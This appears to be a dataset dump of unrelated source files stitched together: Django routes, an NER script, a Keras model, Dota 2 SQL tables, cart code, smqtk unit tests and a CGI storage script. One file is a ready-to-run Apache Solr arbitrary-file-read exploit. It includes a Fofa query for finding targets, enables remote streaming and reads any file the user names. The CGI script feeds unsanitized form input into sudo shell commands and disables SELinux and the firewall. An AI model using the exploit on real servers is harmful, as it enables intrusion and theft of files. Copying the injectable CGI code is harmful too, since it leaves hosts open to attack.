text
stringlengths 8
6.05M
|
|---|
from django.contrib import admin
from django.urls import path,include
from home import views
urlpatterns = [
path('' , views.home,name ='home'),
path('contact', views.contact,name ='contact'),
path('aboutus',views.aboutus,name='aboutus'),
path('serach', views.serach, name='serach'),
]
|
# -*- coding: utf-8 -*-
import nltk
from nltk.tag import StanfordNERTagger
from nltk.tokenize import word_tokenize
from textblob import TextBlob
from itertools import groupby
from operator import itemgetter
from collections import Counter
st = StanfordNERTagger(
'./stanford-ner/classifiers/english.all.3class.distsim.crf.ser.gz',
'./stanford-ner/stanford-ner.jar',
encoding='utf-8')
Names = []
def ner_finder(text):
Blob = TextBlob(text)
for sentence in Blob.sentences:
counting = {}
tokenized_sent = word_tokenize(unicode(sentence))
classified = st.tag(tokenized_sent)
for idx, val in enumerate(classified):
if val[1] == 'PERSON':
counting[idx] = val
keys = sorted(counting.keys())
for k, g in groupby(enumerate(keys), lambda d: d[0] - d[1]):
ids = map(itemgetter(1), g) # [0, 1, 2], [14, 15], etc.
person = ' '.join(counting[i][0] for i in ids) # Donald John Trump, Barack Obama, etc
Names.append(person)
print Names
return Counter(Names)
# text = u'''Donald John Trump never asked Donald John Trump the chief executive of Apple for leadership advice and Barack Obama, Michelle Obama.
# Still, Tim Cook and Donald John Trump could certainly teach the Republican presidential nominee about the art of the apology, telling the Washington Post in an interview published over the weekend that it is important for a leader to admit mistakes and move on.'''
#
# print ner_finder(text)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 1 12:38:01 2019
@author: xabuka
"""
import loading
max_features = 10000
maxlen = 100
training_samples = 1000 # We will be training on 200 samples
validation_samples = 2000 # We will be validating on 10000 samples
data_dir = '../data/SplitedPalSent'
x_train, y_train = loading.load_train(data_dir,maxlen,training_samples,
validation_samples,max_features, Validation= False )
x_test, y_test = loading.load_test(data_dir,maxlen,max_features)
print('input_train shape:', x_train.shape)
print('input_test shape:', x_test.shape)
from keras.models import Sequential
from keras import layers
from keras.optimizers import RMSprop
from keras.layers import Embedding, Conv1D,MaxPooling1D, Dense,Dropout,LSTM
# Embedding
embedding_size = 300
# Convolution
kernel_size = 5
filters = 64
pool_size = 4
# LSTM
lstm_output_size = 70
# Training
batch_size = 32
epochs = 10
model = Sequential()
model.add(Embedding(max_features, embedding_size, input_length=maxlen))
model.add(Dropout(0.25))
model.add(Conv1D(filters, kernel_size, padding='valid', activation='relu', strides=1))
model.add(MaxPooling1D(pool_size=pool_size))
model.add(LSTM(lstm_output_size))
model.add(Dense(3,activation='softmax'))
model.compile(loss = 'categorical_crossentropy', optimizer='adam',metrics = ['accuracy'])
print(model.summary())
from keras.callbacks import EarlyStopping
early_stopping = EarlyStopping(monitor='val_loss', patience=2)
print('Train...')
model.fit(x_train, y_train, batch_size=batch_size,
epochs=epochs,shuffle=True,
validation_split= 0.2)
# testing part, in 2 class matrixes.
from sklearn import metrics
import numpy as np
#print(y_val[:,:])
x_test, y_test = loading.load_test(data_dir,maxlen,max_features)
yhat = model.predict(x_test, verbose = 2, batch_size = batch_size)
print(metrics.classification_report(y_test[:,:], np.round(yhat[:,:]),target_names = ["negative", "positive","no"]))
import matplotlib.pyplot as plt
import numpy as np
score = ['negative', 'positive']
def plot_confusion_matrix(cm, title='Confusion matrix', cmap=plt.cm.Greys):
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(set(score)))
plt.xticks(tick_marks, score, rotation=45)
plt.yticks(tick_marks, score)
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
# Compute confusion matrix
cm = metrics.confusion_matrix(y_test[:,1], np.round(yhat[:,1]))
np.set_printoptions(precision=2)
plt.figure()
plot_confusion_matrix(cm)
cm_normalized = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
plt.figure()
plot_confusion_matrix(cm_normalized, title='Normalized confusion matrix')
plt.show()
scores= model.evaluate(x_test, y_test,verbose=0)
print("Accuracy: %.2f%%" % (scores[1]*100))
|
from .tasks import Task
from .tasks import serialize_task, deserialize_task, serialize_tasks, deserialize_tasks
from .repository import Repository
|
from model.test import test
from controller.webServices import webServices
class testController():
def createTest(hill, city):
vytvorenyTest = test(1, hill, city)
def addQuestion(pointA, pointB):
webServices.findDistance(pointA, pointB)
print("Question len: " + str(test.questions.__len__()))
|
CREATE TABLE `start` (
`id` int(11) NOT NULL,
`начало` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `start` (`id`, `начало`) VALUES
(1, 'герои '),
(2, 'предметы'),
(3, 'справочник'),
(4, 'пикер');
CREATE TABLE `simple items` (
`id` int(11) NOT NULL,
`простые предметы` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `simple items` (`id`, `простые предметы`) VALUES
(1, 'Town Portal Scroll'),
(2, 'Ironwood Branch'),
(3, 'Quelling Blade'),
(4, 'Ring of Regen'),
(5, 'Ring of Health'),
(6, 'Aegis of the Immortal'),
(7, 'Potion'),
(8, 'Gautlets of Strenght'),
(9, 'Ring of protection'),
(10, 'Sages Mask');
CREATE TABLE `neutral items` (
`id` int(11) NOT NULL,
`нейтральные предметы` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `neutral items` (`id`, `нейтральные предметы`) VALUES
(1, 'Разряд 1'),
(2, 'Разряд 2'),
(3, 'Разряд 3'),
(4, 'Разряд 4'),
(5, 'Разряд 5');
CREATE TABLE `items` (
`id` int(11) NOT NULL,
`предметы` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `items` (`id`, `предметы`) VALUES
(1, 'простые'),
(2, 'сборные'),
(3, 'нейтральные');
CREATE TABLE `heroes` (
`id` int(11) NOT NULL,
`герои` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `heroes` (`id`, `герои`) VALUES
(1, 'сила'),
(2, 'ловкость'),
(3, 'интелект');
CREATE TABLE `discharge5` (
`id` int(11) NOT NULL,
`разряд5` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `discharge5` (`id`, `разряд5`) VALUES
(1, 'Force Boots'),
(2, 'Stygian Desolator'),
(3, 'Seer Stone'),
(4, 'Mirror Shield'),
(5, 'Apex'),
(6, 'Ballista'),
(7, 'Book of the dead'),
(8, 'Fallen Sky'),
(9, 'Pirat Hat'),
(10, 'Ex Machina'),
(11, 'Giants Ring'),
(12, 'Book of Shadows');
CREATE TABLE `discharge4` (
`id` int(11) NOT NULL,
`разряд4` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `discharge4` (`id`, `разряд4`) VALUES
(1, 'Timeless Relic'),
(2, 'Spell Prism'),
(3, 'Flicker'),
(4, 'Ninja Gear'),
(5, 'Illusion Cape'),
(6, 'The Leveller'),
(7, 'Minotaur Horn'),
(8, 'Telescope'),
(9, 'Trickster Cloak'),
(10, 'Stormcrafter'),
(11, 'Penta Edged Sword');
CREATE TABLE `discharge3` (
`id` int(11) NOT NULL,
`разряд3` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `discharge3` (`id`, `разряд3`) VALUES
(1, 'Quickening Charm'),
(2, 'Spider Legs'),
(3, 'Paladin Sword'),
(4, 'Orb of Destruction'),
(5, 'Titan Sliver'),
(6, 'Mind Breaker'),
(7, 'Enchanted Quiver'),
(8, 'Elven Tunic'),
(9, 'Cloak of Flames'),
(10, ''),
(11, 'Psychic Headband');
CREATE TABLE `discharge2` (
`id` int(11) NOT NULL,
`разряд2` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `discharge2` (`id`, `разряд2`) VALUES
(1, 'Ring of Aquila'),
(2, 'Imp Claw'),
(3, 'Nether Shawl'),
(4, 'Dragon Scale'),
(5, 'Pupls Gift'),
(6, 'Vambrace'),
(7, 'Grove Bow'),
(8, 'Philosopher stone'),
(9, 'Essence Ring'),
(10, 'Bullwhip'),
(11, 'Quicksilver Amulet');
CREATE TABLE `discharge1` (
`id` int(11) NOT NULL,
`разряд1` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `discharge1` (`id`, `разряд1`) VALUES
(1, 'Keen Optic'),
(2, 'Ironwood Tree'),
(3, 'Ocean Hert'),
(4, 'Broom Handle'),
(5, 'Trusty Shovel'),
(6, 'Faded Broach'),
(7, 'Arcan Ring'),
(8, 'Royal Jelly'),
(9, 'Chipped Vest'),
(10, 'Possessed Mask'),
(11, 'Fairys Trinket');
CREATE TABLE `directory` (
`id` int(11) NOT NULL,
`справочник` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `directory` (`id`, `справочник`) VALUES
(1, 'мета'),
(2, 'роли героев '),
(3, 'словарь '),
(4, 'советы'),
(5, 'моды и команды'),
(6, 'нейтральные крипы'),
(7, 'руны '),
(8, 'вардинг'),
(9, 'фарм');
CREATE TABLE `collect items` (
`id` int(11) NOT NULL,
`сборные предметы` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `collect items` (`id`, `сборные предметы`) VALUES
(1, 'Magic Wand'),
(2, 'Buckler'),
(3, 'Veil of Discord'),
(4, 'Hood of Defiance'),
(5, 'Crystalys'),
(6, 'Dragon Lance'),
(7, 'Null Talisman'),
(8, 'Ring of Basilius'),
(9, 'Glimmer Cape'),
(10, 'Vanguard');
CREATE TABLE `agility heroes` (
`id` int(11) NOT NULL,
`ловкость герои` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `agility heroes` (`id`, `ловкость герои`) VALUES
(1, 'Anti-mage'),
(2, 'Drow Ranger'),
(3, 'Juggernaut'),
(4, 'Mirana'),
(5, 'Morphling'),
(6, 'Phantom Lancer'),
(7, 'Vengeful Spirit'),
(8, 'Riki'),
(9, 'Sniper'),
(10, 'Templar Assassin'),
(11, 'Luna'),
(12, 'Bouty Hunter'),
(13, 'Ursa'),
(14, 'Gyrocopter'),
(15, 'Lone Druid'),
(16, 'Naga Siren'),
(17, 'Troll Warlord'),
(18, 'Ember Spirit'),
(19, 'Monkey King'),
(20, 'Pangolier'),
(21, 'Hoodwink'),
(22, 'Bloodseeker'),
(23, 'Shadow Fiend'),
(24, 'Razor'),
(25, 'Venomancer'),
(26, 'Faceless Void'),
(27, 'Phantom Assassin'),
(28, 'Viper'),
(29, 'Clinkz'),
(30, 'Broodmother'),
(31, 'Weaver'),
(32, 'Spetre'),
(33, 'Meepo'),
(34, 'Nyx Assassin'),
(35, 'Slark'),
(36, 'Medusa'),
(37, 'Terrorblade'),
(38, 'Arc Warden');
CREATE TABLE `intelligence heroes` (
`id` int(11) NOT NULL,
`интеллект герои` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `intelligence heroes` (`id`, `интеллект герои`) VALUES
(1, 'Cristal Maiden'),
(2, 'Puck'),
(3, 'Storm Spirit'),
(4, 'Windranger'),
(5, 'Zeus'),
(6, 'Lina'),
(7, 'Shadow Shaman'),
(8, 'Tinker'),
(9, 'Natures Prophet'),
(10, 'Enchantress'),
(11, 'Jakiro'),
(12, 'Chen'),
(13, 'Silencer'),
(14, 'Ogre Magi'),
(15, 'Rubick'),
(16, 'Disruptor'),
(17, 'Keeper of the light'),
(18, 'Skywrath Mage'),
(19, 'Oracle'),
(20, 'Techies'),
(21, 'Dark Willow'),
(22, 'Void Spirit'),
(23, 'Bane'),
(24, 'Lich'),
(25, 'Lion'),
(26, 'Witch Doctor'),
(27, 'Enigma'),
(28, 'Necrophos'),
(29, 'Warlock'),
(30, 'Queen of Pain'),
(31, 'Death Prophet'),
(32, 'Pugna'),
(33, 'Dazzle'),
(34, 'Leshrac'),
(35, 'Dark Seer'),
(36, 'Batrider'),
(37, 'Ancien Apparition'),
(38, 'Invoker'),
(39, 'Outworld Destroyer'),
(40, 'Shadow Demon'),
(41, 'Visage'),
(42, 'Winter Wyvern'),
(43, 'Grimstroke');
CREATE TABLE `power heroes` (
`id` int(11) NOT NULL,
`герои сила` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `power heroes` (`id`, `герои сила`) VALUES
(1, 'Earthshaker'),
(2, 'Sven'),
(3, 'Tiny'),
(4, 'Kunkka'),
(5, 'Beastmaster'),
(6, 'Dragon Knight'),
(7, 'Clockwerk'),
(8, 'Omniknight'),
(9, 'Huskar'),
(10, 'Alchemist'),
(11, 'Brewmaster'),
(12, 'Trent Protector'),
(13, 'Io'),
(14, 'Centaur Warrunner'),
(15, 'Timbersaw'),
(16, 'Bristleback'),
(17, 'Tusk'),
(18, 'Elder Titan'),
(19, 'Legion Commander'),
(20, 'Earth Spirit'),
(21, 'Phoenix'),
(22, 'Mars'),
(23, 'Snapfire'),
(24, 'Axe'),
(25, 'Pudge'),
(26, 'Sand King'),
(27, 'Slardar'),
(28, 'Tidehunter'),
(29, 'Wraith King'),
(30, 'Lifestealer'),
(31, 'Night Stalker'),
(32, 'Doom'),
(33, 'Spirit Breaker'),
(34, 'Lycan'),
(35, 'Chaos Knight'),
(36, 'Undying'),
(37, 'Magnus'),
(38, 'Abaddon'),
(39, 'Underlord');
|
# Generated by Django 2.2.7 on 2019-11-09 10:09
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Sneakers',
fields=[
('id_sneaker', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=100)),
('brand', models.CharField(max_length=45)),
('material', models.CharField(max_length=45)),
('price', models.IntegerField()),
],
),
]
|
# coding=utf-8
# Apache Solr 全版本任意文件读取
# Fofa:app="Apache-Solr" || app="Solr"
import requests
import json
import sys
import time
def title():
print("+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+")
print("+~~~~~~ Apache Solr 全版本任意文件读取 ~~~~~~+")
print("+~~~~~~ Use: python3 solr.py ~~~~~~+")
print("+~~~~~~ url: http://x.x.x.x:port ~~~~~~+")
print("+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+")
time.sleep(2)
def get_name(url):
url_1 = url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
res = requests.get(url=url_1)
#将json数据python字典话
name = str(list(json.loads(res.text)["status"])[0])
print("[!] 获取到目标系统name:\033[31m%s\033[0m"%name+" [0]"+"URL:"+url+"/solr/"+name+"/config")
return name
except Exception as e:
print("[!] 目标URL无法进行利用。",e)
sys.exit(0)
def check_vul(url,name):
url_2 = url +"/solr/" + name + "/config"
data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
try:
res = requests.post(url=url_2,data=data)
if "This response format" in res.text and res.status_code == 200:
print("[!] \033[31m目标系统存在漏洞\033[0m")
else:
print("[!] 目标系统不存在漏洞")
sys.exit(0)
except Exception as e:
print("[!] 目标系统请求失败。")
sys.exit(0)
def read_files(url,name,file_name):
url = url + "/solr/" + name + "/debug/dump?param=ContentStreams"
# 此处必须要加content-type,否则读取不到文件
headers = {
"Content-Type" : "application/x-www-form-urlencoded"
}
data = "stream.url=file://{}".format(file_name)
try:
res = requests.post(url=url,headers=headers,data=data)
if "No such file or directory" in res.text:
print("[!] 目标系统读取文件失败!")
sys.exit(0)
else:
print("正在读取文件..........")
content = (json.loads(res.text)["streams"][0]["stream"])
print("[o] 读取文件内容为:\n\033[34m{}\033\0m".format(content))
except Exception as e:
print("[!] 目标系统似乎意外中断了",e)
sys.exit(0)
if __name__ == "__main__":
title()
url = str(input("\n[!] 请输入目标系统URL: "))
name = get_name(url)
check_vul(url,name)
file_name = str(input("[!] 请输入要读取的文件:"))
read_files(url,name,file_name)
|
from be.model import store
import sqlite3 as sqlite
import logging
#判断商品是否还有库存
def check_num(goodsId, goodsNum):
try:
conn = store.get_db_conn()
cursor = conn.execute(
"SELECT goodsNum from goods where goodsId=?",
(goodsId),
)
row = cursor.fetchone()
if row is None or row[1]-goodsNum < 0:
return False
except sqlite.Error as e:
logging.error(str(e))
return False
return True
class Cart:
username: str
goodsId: str
goodsName: str
goodsPrice: str
goodsNum: str
totalValue: str
def __init__(self, username, goodsId, goodsName, goodsPrice, goodsNum, totalValue):
self.username = username
self.goodsId = goodsId
self.goodsName = goodsName
self.goodsPrice = goodsPrice
self.goodsNum = goodsNum
self.totalValue = totalValue
def addCart(username, goodsId, goodsName, goodsPrice, goodsNum, totalValue) -> bool:
conn = store.get_db_conn()
try:
#添加一个判断,商品是否还有库存
if not check_num(goodsId, goodsNum):
return False
conn.execute(
"INSERT into cart(username, goodsId, goodsName, goodsPrice, goodsNum, totalValue) VALUES (?, ?, ?, ?, ?, ?);",
(username, goodsId, goodsName, goodsPrice, goodsNum, totalValue),
)
conn.commit()
except BaseException as e:
print(e)
conn.rollback()
return False
return True
def delCart(username, goodsId, goodsNum) -> bool:
conn = store.get_db_conn()
try:
cursor = conn.execute(
"SELECT goodsNum, goodsPrice from cart where username=? and goodsId=?",
(username, goodsId),
)
row = cursor.fetchone()
if row is None:
return False
newgoodsNum = row[0] - goodsNum
newtotalValue = row[1]*newgoodsNum
if newgoodsNum == 0:
cursor = conn.execute("DELETE from cart where username=? and goodsId=?", (username, goodsId))
else:
conn.execute(
"UPDATE cart set goodsNum = ? where username=? and goodsId=?",
(newgoodsNum, username, goodsId),
)
conn.execute(
"UPDATE cart set totalValue = ? where username=? and goodsId=?",
(newtotalValue, username, goodsId),
)
conn.commit()
except BaseException as e:
print(e)
conn.rollback()
return False
return True
def getCart(username) -> (bool, list, float):
conn = store.get_db_conn()
try:
cursor = conn.execute(
"SELECT goodsName, goodsPrice, goodsNum, totalValue from cart where username=?",
(username),
)
contents = cursor.fetchall()
if contents is None:
return False, []
cartlist = []
sum = 0
for row in contents:
a = [row[0], row[1], row[2]]
sum += row[3]
cartlist.append(a)
except sqlite.Error as e:
logging.error(str(e))
return False
return True, cartlist, sum
|
import unittest
import numpy
import six
from six.moves import cPickle as pickle
from smqtk.representation.data_element.memory_element import DataMemoryElement
from smqtk.representation.descriptor_element.local_elements import \
DescriptorMemoryElement
from smqtk.representation.descriptor_index.memory import MemoryDescriptorIndex
from smqtk.utils import merge_dict
RAND_UUID = 0
def random_descriptor():
global RAND_UUID
d = DescriptorMemoryElement('random', RAND_UUID)
d.set_vector(numpy.random.rand(64))
RAND_UUID += 1
return d
class TestMemoryDescriptorIndex (unittest.TestCase):
def test_is_usable(self):
# Always usable because no dependencies.
self.assertEqual(MemoryDescriptorIndex.is_usable(), True)
def test_default_config(self):
# Default should be valid for constructing a new instance.
c = MemoryDescriptorIndex.get_default_config()
self.assertEqual(MemoryDescriptorIndex.from_config(c).get_config(), c)
def test_from_config_null_cache_elem(self):
inst = MemoryDescriptorIndex.from_config({'cache_element': None})
self.assertIsNone(inst.cache_element)
self.assertEqual(inst._table, {})
inst = MemoryDescriptorIndex.from_config({
'cache_element': {
'type': None
}
})
self.assertIsNone(inst.cache_element)
self.assertEqual(inst._table, {})
def test_from_config_null_cache_elem_type(self):
# An empty cache should not trigger loading on construction.
expected_empty_cache = DataMemoryElement()
inst = MemoryDescriptorIndex.from_config({
'cache_element': {
'type': 'DataMemoryElement',
'DataMemoryElement': {'bytes': ''}
}
})
self.assertEqual(inst.cache_element, expected_empty_cache)
self.assertEqual(inst._table, {})
def test_from_config(self):
# Configured cache with some picked bytes
expected_table = dict(a=1, b=2, c=3)
expected_cache = DataMemoryElement(bytes=pickle.dumps(expected_table))
inst = MemoryDescriptorIndex.from_config({
'cache_element': {
'type': 'DataMemoryElement',
'DataMemoryElement': {'bytes': expected_cache.get_bytes()}
}
})
self.assertEqual(inst.cache_element, expected_cache)
self.assertEqual(inst._table, expected_table)
def test_init_no_cache(self):
inst = MemoryDescriptorIndex()
self.assertIsNone(inst.cache_element, None)
self.assertEqual(inst._table, {})
def test_init_empty_cache(self):
cache_elem = DataMemoryElement()
inst = MemoryDescriptorIndex(cache_element=cache_elem)
self.assertEqual(inst.cache_element, cache_elem)
self.assertEqual(inst._table, {})
def test_init_with_cache(self):
d_list = (random_descriptor(), random_descriptor(),
random_descriptor(), random_descriptor())
expected_table = dict((r.uuid(), r) for r in d_list)
expected_cache = DataMemoryElement(bytes=pickle.dumps(expected_table))
inst = MemoryDescriptorIndex(expected_cache)
self.assertEqual(len(inst._table), 4)
self.assertEqual(inst.cache_element, expected_cache)
self.assertEqual(inst._table, expected_table)
self.assertEqual(set(inst._table.values()), set(d_list))
def test_get_config(self):
self.assertEqual(
MemoryDescriptorIndex().get_config(),
MemoryDescriptorIndex.get_default_config()
)
self.assertEqual(
MemoryDescriptorIndex(None).get_config(),
MemoryDescriptorIndex.get_default_config()
)
empty_elem = DataMemoryElement()
self.assertEqual(
MemoryDescriptorIndex(empty_elem).get_config(),
merge_dict(MemoryDescriptorIndex.get_default_config(), {
'cache_element': {'type': 'DataMemoryElement'}
})
)
dict_pickle_bytes = pickle.dumps({1: 1, 2: 2, 3: 3}, -1)
cache_elem = DataMemoryElement(bytes=dict_pickle_bytes)
self.assertEqual(
MemoryDescriptorIndex(cache_elem).get_config(),
merge_dict(MemoryDescriptorIndex.get_default_config(), {
'cache_element': {
'DataMemoryElement': {
'bytes': dict_pickle_bytes
},
'type': 'DataMemoryElement'
}
})
)
def test_cache_table_no_cache(self):
inst = MemoryDescriptorIndex()
inst._table = {}
inst.cache_table() # should basically do nothing
self.assertIsNone(inst.cache_element)
def test_cache_table_empty_table(self):
inst = MemoryDescriptorIndex(DataMemoryElement(), -1)
inst._table = {}
expected_table_pickle_bytes = pickle.dumps(inst._table, -1)
inst.cache_table()
self.assertIsNotNone(inst.cache_element)
self.assertEqual(inst.cache_element.get_bytes(),
expected_table_pickle_bytes)
def test_add_descriptor(self):
index = MemoryDescriptorIndex()
d1 = random_descriptor()
index.add_descriptor(d1)
self.assertEqual(index._table[d1.uuid()], d1)
d2 = random_descriptor()
index.add_descriptor(d2)
self.assertEqual(index._table[d2.uuid()], d2)
def test_add_many(self):
descrs = [
random_descriptor(),
random_descriptor(),
random_descriptor(),
random_descriptor(),
random_descriptor(),
]
index = MemoryDescriptorIndex()
index.add_many_descriptors(descrs)
# Compare code keys of input to code keys in internal table
self.assertEqual(set(index._table.keys()),
set([e.uuid() for e in descrs]))
# Get the set of descriptors in the internal table and compare it with
# the set of generated random descriptors.
r_set = set()
[r_set.add(d) for d in index._table.values()]
self.assertEqual(
set([e for e in descrs]),
r_set
)
def test_count(self):
index = MemoryDescriptorIndex()
self.assertEqual(index.count(), 0)
d1 = random_descriptor()
index.add_descriptor(d1)
self.assertEqual(index.count(), 1)
d2, d3, d4 = (random_descriptor(),
random_descriptor(),
random_descriptor())
index.add_many_descriptors([d2, d3, d4])
self.assertEqual(index.count(), 4)
d5 = random_descriptor()
index.add_descriptor(d5)
self.assertEqual(index.count(), 5)
def test_get_descriptors(self):
descrs = [
random_descriptor(), # [0]
random_descriptor(), # [1]
random_descriptor(), # [2]
random_descriptor(), # [3]
random_descriptor(), # [4]
]
index = MemoryDescriptorIndex()
index.add_many_descriptors(descrs)
# single descriptor reference
r = index.get_descriptor(descrs[1].uuid())
self.assertEqual(r, descrs[1])
# multiple descriptor reference
r = list(index.get_many_descriptors([descrs[0].uuid(),
descrs[3].uuid()]))
self.assertEqual(len(r), 2)
self.assertEqual(set(r),
{descrs[0], descrs[3]})
def test_clear(self):
i = MemoryDescriptorIndex()
n = 10
descrs = [random_descriptor() for _ in range(n)]
i.add_many_descriptors(descrs)
self.assertEqual(len(i), n)
i.clear()
self.assertEqual(len(i), 0)
self.assertEqual(i._table, {})
def test_has(self):
i = MemoryDescriptorIndex()
descrs = [random_descriptor() for _ in range(10)]
i.add_many_descriptors(descrs)
self.assertTrue(i.has_descriptor(descrs[4].uuid()))
self.assertFalse(i.has_descriptor('not_an_int'))
def test_added_descriptor_table_caching(self):
cache_elem = DataMemoryElement(readonly=False)
descrs = [random_descriptor() for _ in range(3)]
expected_table = dict((r.uuid(), r) for r in descrs)
i = MemoryDescriptorIndex(cache_elem)
self.assertTrue(cache_elem.is_empty())
# Should add descriptors to table, caching to writable element.
i.add_many_descriptors(descrs)
self.assertFalse(cache_elem.is_empty())
self.assertEqual(pickle.loads(i.cache_element.get_bytes()),
expected_table)
# Changing the internal table (remove, add) it should reflect in
# cache
new_d = random_descriptor()
expected_table[new_d.uuid()] = new_d
i.add_descriptor(new_d)
self.assertEqual(pickle.loads(i.cache_element.get_bytes()),
expected_table)
rm_d = list(expected_table.values())[0]
del expected_table[rm_d.uuid()]
i.remove_descriptor(rm_d.uuid())
self.assertEqual(pickle.loads(i.cache_element.get_bytes()),
expected_table)
def test_remove(self):
i = MemoryDescriptorIndex()
descrs = [random_descriptor() for _ in range(100)]
i.add_many_descriptors(descrs)
self.assertEqual(len(i), 100)
self.assertEqual(list(i.iterdescriptors()), descrs)
# remove singles
i.remove_descriptor(descrs[0].uuid())
self.assertEqual(len(i), 99)
self.assertEqual(set(i.iterdescriptors()),
set(descrs[1:]))
# remove many
rm_d = descrs[slice(45, 80, 3)]
i.remove_many_descriptors((d.uuid() for d in rm_d))
self.assertEqual(len(i), 99 - len(rm_d))
self.assertEqual(set(i.iterdescriptors()),
set(descrs[1:]).difference(rm_d))
def test_iterdescrs(self):
i = MemoryDescriptorIndex()
descrs = [random_descriptor() for _ in range(100)]
i.add_many_descriptors(descrs)
self.assertEqual(set(i.iterdescriptors()),
set(descrs))
def test_iterkeys(self):
i = MemoryDescriptorIndex()
descrs = [random_descriptor() for _ in range(100)]
i.add_many_descriptors(descrs)
self.assertEqual(set(i.iterkeys()),
set(d.uuid() for d in descrs))
def test_iteritems(self):
i = MemoryDescriptorIndex()
descrs = [random_descriptor() for _ in range(100)]
i.add_many_descriptors(descrs)
self.assertEqual(set(six.iteritems(i)),
set((d.uuid(), d) for d in descrs))
|
#!/usr/bin/python2
import commands
import cgi,cgitb
print "Content-type : text/html"
print ""
cgitb.enable()
x=cgi.FieldStorage()
user=x.getvalue('usr')
password=x.getvalue('passwd')
hd=x.getvalue('hd')
#for radio button
n=x.getvalue('x')
commands.getoutput("systemctl restart httpd")
commands.getoutput("setenforce 0")
commands.getoutput("iptables -F")
#a=commands.getoutput("cat /var/www/html/users.txt | grep "+user+ " | awk '{print$1}'")
#b=commands.getoutput("cat /var/www/html/users.txt | grep "+password+ " | awk '{print$7}'")
#NFS--------------------------------------------------------------------
#if (n=="1") and (a !="") and (b !="") :
if (n=="1") :
#1st need to create volume group(vg1)
commands.getoutput("sudo lvcreate --name "+user+" --size "+hd+"G vg1")
commands.getoutput("sudo mkfs.ext4 /dev/vg1/"+user+" ")
commands.getoutput("sudo mkdir /media/"+user )
commands.getoutput("sudo mount /dev/vg1/"+user+" /media/"+user+"")
commands.getoutput("sudo echo '\n /media/"+user+" *(rw,no_root_squash) \n' >>/etc/exports")
commands.getoutput("sudo exportfs -r")
commands.getoutput("setenforce 0")
f1=open('/var/www/html/clienttar/staasclient.py','w+')
f1.write("#!/usr/bin/python2 \nimport os \nos.system('yum install nfs-utils -y') \nos.system('systemctl restart nfs')\nos.system('setenforce 0')\nos.system('iptables -F')\nos.system('mkdir /media/mystorage')\nos.system('mount 192.168.43.103:/media/"+user+" /media/mystorage')")
f1.close()
commands.getoutput('sudo chmod 777 /var/www/html/clienttar/staasoclient.py')
commands.getoutput("sudo tar -cvf /var/www/html/clienttar/"+user+"_staas.tar /var/www/html/clienttar/staasclient.py")
print "<html>"
print "<p><a href='http://192.168.43.103/clienttar/"+user+"_staas.tar' download>Downlode</a>tar file and run it</p>"
print "</html>"
#SSHFS--------------------------------------------------------------------
elif (n=="2") and (a !="") and (b !=""):
#commands.getoutput("sudo useradd "+user+"")
#commands.getoutput("sudo echo "+passwd+"| sudo passwd "+user+" --stdin")
commands.getoutput("sudo lvcreate --name "+user+" --size "+hd+"G vg1")
commands.getoutput("sudo mkfs.ext4 /dev/vg1/"+user+"")
commands.getoutput("sudo mkdir /media/"+user+"")
commands.getoutput("sudo mount /dev/vg1/"+user+" /media/"+user+"")
commands.getoutput("sudo chown "+user+" /media/"+user+"")
commands.getoutput("sudo chmod 777 /cloud/"+user+" ")
f1=open('/var/www/html/clienttar/staasclient.py','w+')
f1.write("\nimport commands\ncommands.getoutput('yum install fuse-sshfs')\ncommands.getoutput('systemctl restart sshfs')\ncommands.getoutput('systemctl restart sshd')\ncommands.getoutput('mkdir /root/Desktop/"+user+" ')\ncommands.getoutput('sshfs "+user+"@192.168.43.103:/"+user + " /root/Desktop/"+user+" ')\n ")
f1.close()
commands.getoutput('sudo chmod 777 /var/www/html/sshfs.py')
commands.getoutput("sudo tar -cvf /var/www/html/clienttar/"+user+"_staas.tar /var/www/html/clienttar/staasclient.py")
print "<html>"
print "<p><a href='http://192.168.43.103/clienttar/"+user+"_staas.tar' download>Downlode</a> tar file and run it.......</p>"
print "</html>"
#ISCSI--------------------------------------------------------------------
elif (n=="3") and (a !="") and (b !=""):
#yum install iscsi-target-utils
commands.getoutput("sudo lvcreate --name "+user+" --size "+hd+"G vg1")
f1=open('/etc/tgt/targets.conf','a')
f1.write("<target "+user+">\nbacking-store /dev/vg1/"+user + "\n</target>\n")
f1.close()
commands.getoutput("sudo systemctl restart tgtd")
f1=open('/var/www/html/clienttar/iscsi.py','w+')
